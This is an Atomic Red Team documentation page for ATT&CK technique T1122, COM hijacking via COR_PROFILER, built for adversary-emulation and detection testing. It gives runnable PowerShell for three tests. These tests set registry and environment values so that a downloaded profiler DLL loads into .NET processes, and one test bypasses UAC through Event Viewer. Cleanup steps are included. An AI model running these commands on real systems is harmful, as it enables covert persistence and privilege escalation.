CircleCI Atomic Red Team doc generator
8.1 KiB
T1122 - Component Object Model Hijacking
Description from ATT&CK
The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.
Atomic Tests
-
Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER
-
Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER
-
Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER
Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER
Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). The unmanaged profiler DLL (atomicNotepad.dll) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
Supported Platforms: Windows
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1122\bin\T1122x64.dll |
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c} |
Attack Commands: Run with powershell!
Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
Cleanup Commands:
Write-Host "Removing registry keys" -ForegroundColor Cyan
Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
Dependencies: Run with powershell!
Description: #{file_name} must be present
Check Prereq Commands:
if (Test-Path #{file_name}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER
Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. The unmanaged profiler DLL (atomicNotepad.dll) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
Supported Platforms: Windows
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1122\bin\T1122x64.dll |
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c} |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Write-Host "Creating system environment variables" -ForegroundColor Cyan
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Cleanup Commands:
Write-Host "Removing system environment variables" -ForegroundColor Cyan
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force | Out-Null
Dependencies: Run with powershell!
Description: #{file_name} must be present
Check Prereq Commands:
if (Test-Path #{file_name}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER
Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (atomicNotepad.dll) executes when the CLR is loaded by PowerShell.
Supported Platforms: Windows
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder\T1122\bin\T1122x64.dll |
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c} |
Attack Commands: Run with powershell!
$env:COR_ENABLE_PROFILING = 1
$env:COR_PROFILER = '#{clsid_guid}'
$env:COR_PROFILER_PATH = '#{file_name}'
POWERSHELL -c 'Start-Sleep 1'
Cleanup Commands:
$env:COR_ENABLE_PROFILING = 0
$env:COR_PROFILER = ''
$env:COR_PROFILER_PATH = ''
Dependencies: Run with powershell!
Description: #{file_name} must be present
Check Prereq Commands:
if (Test-Path #{file_name}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"